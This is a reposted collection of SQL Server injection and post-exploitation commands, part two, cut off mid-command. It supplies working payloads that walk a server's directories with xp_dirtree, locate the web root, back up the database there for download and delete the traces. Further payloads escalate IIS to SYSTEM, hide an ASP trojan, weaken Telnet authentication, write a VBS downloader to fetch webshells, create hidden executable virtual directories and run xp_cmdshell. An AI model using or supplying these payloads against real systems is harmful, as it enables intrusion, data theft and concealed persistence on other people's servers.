Sorting out the most detailed SQL Injection-related commands (2)

Source: Internet
Author: User

Next, create a second temporary table, temp1, to hold every directory that sits one level below a first-level subdirectory of drive D. The statement is:

;create table temp1 (dir nvarchar(255), depth varchar(255));--

Save every directory under one first-level subdirectory of drive D into temp1 (temp still holds the listing of d:\ from the previous step; the not in list skips the standard Windows directories). The statement is:

;declare @dirname varchar(255); set @dirname='d:\'+(select top 1 dir from (select top 1 dir from temp where depth=1 and dir not in ('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM volume') order by dir desc) T order by dir); insert into temp1 exec master.dbo.xp_dirtree @dirname--

To store the next first-level subdirectory of drive D instead, change the second top 1 to top 2: the inner top N ... order by dir desc keeps the N largest names and the outer top 1 ... order by dir returns the smallest of them, so raising N steps through the candidates one at a time.

temp1 now holds every directory under that first-level subdirectory of drive D. The same test as before tells us whether the web root may be at this level:

and (select count(*) from temp1 where dir<>'user')<(select count(*) from temp1)

The condition is true when temp1 contains a directory named user; substitute other names you would expect directly under a web root and test several. If the result is true, the web root may be this subdirectory. If every probe returns false, the web root is not here, so repeat the process for the second, third, ... first-level subdirectories of the drive. Empty temp1 (delete from temp1) before each new xp_dirtree run so that listings from different directories do not mix.

Now suppose the web root is under a first-level subdirectory of drive D named website (I won't go into how the directory name is read out of temp1). Because we know that the web root sits at depth 2, we still have to find which directory under website is the real web root.

Create the third temporary table in the same way:

;create table temp2 (dir nvarchar(255), depth varchar(255));--

Then save every directory under one subdirectory of d:\website into temp2. The statement is:

;declare @dirname varchar(255); set @dirname='d:\website\'+(select top 1 dir from (select top 1 dir from temp1 where depth=1 and dir not in ('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM volume') order by dir desc) T order by dir); insert into temp2 exec master.dbo.xp_dirtree @dirname--

To take the next subdirectory of d:\website instead, change the second top 1 to top 2, as above.

Then apply the same test to decide whether this directory is the web root:

and (select count(*) from temp2 where dir<>'user')<(select count(*) from temp2)

If the result is true, confirm it by probing several more directory names as described above; when several probes return true, treat the directory as the web root.

That is essentially how the web root is found. Assume it is D:\website\www. We can then back up the current database into that directory and download it over HTTP. Before the backup, empty temp, temp1 and temp2 and load the full directory trees of drives C, D and E into them, so that the listings travel inside the backup file.

After downloading the database, remember to drop the three temporary tables. The downloaded database now contains the complete directory listings, including the back-end administration directory, along with everything else stored in it.
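The walk described above, consolidated into one T-SQL script as an added example (it is not code from the original page). Every statement after the table creation is what would be injected as `;<statement>--`, and the commented `and (...)` lines are the boolean probes appended to the vulnerable query. The database name dvbbs, the list of marker directory names and the web root d:\website\www are assumptions.

```sql
-- Added example, not from the original page. Assumed: database dvbbs,
-- marker directory names, web root d:\website\www.

-- Scratch tables. xp_dirtree with a single argument returns (subdirectory, depth).
create table temp  (dir nvarchar(255), depth varchar(255));
create table temp1 (dir nvarchar(255), depth varchar(255));
create table temp2 (dir nvarchar(255), depth varchar(255));

-- Step 1: full tree of d:\ (depth 1 rows are the first-level subdirectories).
insert into temp exec master.dbo.xp_dirtree 'd:\';

-- Step 2: list one first-level subdirectory into temp1. The nested
-- "top N ... desc" / "top 1 ... asc" pair selects the N-th candidate counting
-- from the end of the alphabetical list; raise the inner top N to step through
-- the candidates one at a time. Empty temp1 first so listings never mix.
delete from temp1;
declare @dirname varchar(255);
set @dirname = 'd:\' + (select top 1 dir from
    (select top 1 dir from temp
     where depth = 1 and dir not in ('Documents and Settings','Program Files',
       'RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub',
       'Microsoft UAM volume')
     order by dir desc) T
  order by dir);
insert into temp1 exec master.dbo.xp_dirtree @dirname;

-- Step 3: boolean probe appended to the injectable query. True when temp1
-- holds any directory that typically sits directly under a web root; this
-- generalises the page's single-name "dir<>'user'" form (marker names assumed).
-- and (select count(*) from temp1 where depth = 1
--      and dir in ('user','images','admin','inc','upload')) > 0

-- Step 4: one level deeper, same mechanics, from d:\website\ into temp2.
delete from temp2;
declare @dirname2 varchar(255);
set @dirname2 = 'd:\website\' + (select top 1 dir from
    (select top 1 dir from temp1 where depth = 1 order by dir desc) T
  order by dir);
insert into temp2 exec master.dbo.xp_dirtree @dirname2;
-- and (select count(*) from temp2 where depth = 1
--      and dir in ('user','images','admin','inc','upload')) > 0

-- Step 5: once the web root is known, put the full drive listings into the
-- scratch tables so they ship inside the backup, then write the backup
-- under the web root and fetch it over HTTP.
delete from temp; delete from temp1; delete from temp2;
insert into temp  exec master.dbo.xp_dirtree 'c:\';
insert into temp1 exec master.dbo.xp_dirtree 'd:\';
insert into temp2 exec master.dbo.xp_dirtree 'e:\';
backup database dvbbs to disk = 'd:\website\www\save.db';
-- after downloading http://host/save.db, remove the evidence:
drop table temp; drop table temp1; drop table temp2;
```

Two practical points: the backup file is a native SQL Server backup, so it has to be restored on your own SQL Server before the temp tables can be read, and the `delete from tempN` before each xp_dirtree run matters, because a stale row from an earlier directory is enough to make a marker probe return a false positive.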

21. Raising the web user to SYSTEM on Windows 2000. Registering the ISAPI extensions, including asp.dll, in the InProcessIsapiApps list makes them run inside inetinfo.exe, which runs as LocalSystem. Administrator rights are required to execute the command:

C:\>cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll"

On systems installed under C:\windows:

cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\windows\system32\idq.dll" "C:\windows\system32\inetsrv\httpext.dll" "C:\windows\system32\inetsrv\httpodbc.dll" "C:\windows\system32\inetsrv\ssinc.dll" "C:\windows\system32\msw3prt.dll" "C:\windows\system32\inetsrv\asp.dll"

Check whether it succeeded:

C:\>cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps

Microsoft (R) Windows Script Host Version 5.6
Copyright (C) Microsoft Corporation 1996-2001. All rights reserved.
inprocessisapiapps : (LIST) (6 Items)
 "C:\WINNT\system32\idq.dll"
 "C:\WINNT\system32\inetsrv\httpext.dll"
 "C:\WINNT\system32\inetsrv\httpodbc.dll"
 "C:\WINNT\system32\inetsrv\ssinc.dll"
 "C:\WINNT\system32\msw3prt.dll"
 "C:\winnt\system32\inetsrv\asp.dll"

22. Hiding an ASP trojan:
Create a non-standard directory (the trailing ..\ yields a name that Explorer cannot open or delete normally): mkdir images..\
Copy the ASP trojan into it: copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
Access the trojan over the web: http://ip/images../news.asp?Action=login
To delete the non-standard directory: rmdir images..\ /s

23. Remove Telnet NTLM authentication, so that the Telnet service accepts plain password logins:
;exec master.dbo.xp_cmdshell 'tlntadmn config sec=-ntlm'--

24. Use echo to write the file-download script iget.vbs (the ^ characters keep cmd.exe from interpreting the double quotes):
(1) echo Set x=createObject(^"Microsoft.XMLHTTP^"):x.open ^"GET^",LCase(WScript.arguments(0)),0:x.send():Set s=createObject(^"ADODB.stream^"):s.mode=3:s.type=1:s.open():s.write(x.responseBody):s.saveToFile LCase(WScript.arguments(1)),2 >c:\iget.vbs

(2) c:\>cscript iget.vbs http://127.0.0.1/asp/dbm6.asp dbm6.asp

25. Manually create a hidden IIS virtual directory:
• List the existing virtual directories: cscript.exe c:\inetpub\AdminScripts\adsutil.vbs enum w3svc/1/root
• Create the physical directory: mkdir c:\asp\kiss
• Create the kiss virtual directory: cscript.exe c:\inetpub\AdminScripts\mkwebdir.vbs -c MyComputer -w "Default Web Site" -v "kiss","c:\asp\kiss"
• Grant write and execute permissions on kiss:
cscript.exe c:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/kiss/accesswrite "true" -s:
cscript.exe c:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/kiss/accessexecute "true" -s:
• Optionally, make processes launched from kiss run in the system context instead of as the impersonated user: cscript c:\inetpub\AdminScripts\adsutil.vbs set /w3svc/1/root/kiss/createprocessasuser false
• Access it: http://127.0.0.1/kiss/test.asp

26. Test an openrowset() connection back to the local server (111111 is the page's example sa password; the alias a is a placeholder):
select a.* from openrowset('SQLOLEDB','127.0.0.1';'sa';'111111','select * from [dvbbs].[dbo].[dv_admin]') as a

select * from openrowset('SQLOLEDB','127.0.0.1';'sa';'111111','select * from [dvbbs].[dbo].[dv_admin]')

27. Get the host name (the failed conversion to int produces an error that quotes the value):
http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@servername)--
select convert(int,@@servername)
select @@servername

28. Get the database user name:
http://www.XXXX.com/FullStory.asp?id=1 and 1=convert(int,system_user)--
http://www.19cn.com/showdetail.asp?id=49 and user>0
select user

29. Second method for an ordinary user to get a webshell:
• Pack the file into a cabinet:
exec [master].[dbo].[xp_makecab] 'c:\test.rar','default',1,'d:\cmd.asp'
• Unpack it to obtain the webshell:
exec [master].[dbo].[xp_unpackcab] 'c:\test.rar','c:\',1,'n.asp'
• Read any file (requires dbo rights in master):
exec [master].[dbo].[xp_readerrorlog] 1,'c:\cmd.asp'

30. With sa rights and a known web path, back up the database straight into the web directory:

http://www.XXXX.com/FullStory.asp?id=1;backup database <name> to disk='c:\inetpub\wwwroot\save.db'--

This writes the whole database into the web directory, from where the file can be downloaded over HTTP (a web virtual directory is preferable where one is known).

• To traverse the system's directory structure and pick the web virtual directory out of the results, first create a temporary table temp:
http://www.XXXX.com/FullStory.asp?id=1;create table temp (id nvarchar(255), num1 nvarchar(255), num2 nvarchar(255), num3 nvarchar(255));--
• Then use xp_availablemedia to store all current drives in temp:
http://www.XXXX.com/FullStory.asp?id=1;insert temp exec master.dbo.xp_availablemedia;--
• Query temp to read the drive list and related information, or use xp_subdirs to store a subdirectory listing in temp:
http://www.XXXX.com/FullStory.asp?id=1;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--
• xp_dirtree can also load the directory tree of all subdirectories into temp in one go:
http://www.XXXX.com/FullStory.asp?id=1;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--
With this, every directory (folder) on the system can be browsed.
• To view the contents of a file, use xp_cmdshell (the path is cut off in the source):
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\we
